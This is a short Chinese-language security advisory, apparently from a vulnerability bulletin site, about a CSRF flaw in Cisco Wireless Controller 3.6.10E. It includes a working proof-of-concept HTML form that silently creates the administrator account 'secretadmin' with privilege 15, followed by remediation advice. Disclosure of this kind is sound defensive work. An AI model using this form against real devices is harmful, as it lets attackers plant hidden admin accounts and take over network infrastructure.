Cisco Wireless Controller 3.6.10E CSRF漏洞安全通告
发布时间 2019-07-26漏洞编号和级别
CVE编号:暂无,危险级别:高危,CVSS分值:官方未评定
影响版本
受影响的版本
适用于Cisco Wireless Controller 3.6.10E。
漏洞概述
Cisco Wireless Controller 3.6.10E是Cisco发布的一款无线控制器,可为关键任务提供可靠的性能。
Cisco Wireless Controller 3.6.10E容易受到CSRF攻击,攻击者将精心设计的请求发送给具有管理员级别访问权限的用户,打开URL后,将通过管理员的会话提交表单,并成功将新用户添加为管理员。
漏洞验证
<html>
<body>
<form action="http://IP/security/cfgSecurityAAAUsersCreate
<http://192.168.1.1/security/cfgSecurityAAAUsersCreate>" method="POST">
<input type="hidden" name="username" value="secretadmin" />
<input type="hidden" name="privilege" value="15" />
<input type="hidden" name="password" value="K3Y" />
<input type="hidden" name="description" value="CSRF" />
<input type="hidden" name="type" value="lobby-admin" />
<input type="hidden" name="cfnpassword" value="K3Y" />
<input type="hidden" name="yearlife" value="2013" />
<input type="hidden" name="hourlife" value="16" />
<input type="hidden" name="monthlife" value="7" />
<input type="hidden" name="minlife" value="17" />
<input type="hidden" name="datelife" value="16" />
<input type="hidden" name="seclife" value="0" />
</form>
</body>
</html>
修复建议
1、关注官方网站,及时进行更新;
2、验证HTTP Referer字段;
3、在请求地址中添加token并验证;
4、在HTTP头中自定义属性并验证。


京公网安备11010802024551号